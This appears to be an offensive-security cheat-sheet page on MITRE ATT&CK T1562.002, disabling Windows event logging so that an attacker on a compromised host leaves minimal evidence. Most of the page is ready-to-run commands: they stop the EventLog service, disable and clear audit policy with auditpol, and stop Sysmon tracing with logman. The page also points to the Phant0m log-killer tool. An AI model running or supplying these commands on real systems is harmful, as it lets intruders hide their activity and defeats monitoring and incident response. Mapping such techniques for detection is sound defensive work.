Disable Windows Event Logging

MITRE ATT&CK, Defense Evasion, Sub-technique T1562.002

Disabling Windows event logging allows for an attacker to operate on a compromised host while leaving minimal evidence behind.

Methods

# Disable the EventLog service with PowerShell:
Stop-Service -Name EventLog

# Disable auditing for the Account Logon category:
auditpol /set /category:"Account Logon" /success:disable /failure:disable

# Clear the audit policy
auditpol /clear /y
auditpol /remove /allusers

# Disable Sysmon
## https://twitter.com/_batsec_/status/1327386867365457920?s=20&t=rMzsQI6ENH2SYVVaTYTqAA
logman stop EventLog-Microsoft-Windows-Sysmon-Operational -ets

Tools

GitHub - hlldz/Phant0m: Windows Event Log KillerGitHub

References

Impair Defenses: Disable Windows Event Logging, Sub-technique T1562.002 - Enterprise | MITRE ATT&CK®

PreviousDisable or Modify Tools NextImpair Command History Logging

Last updated 1 year ago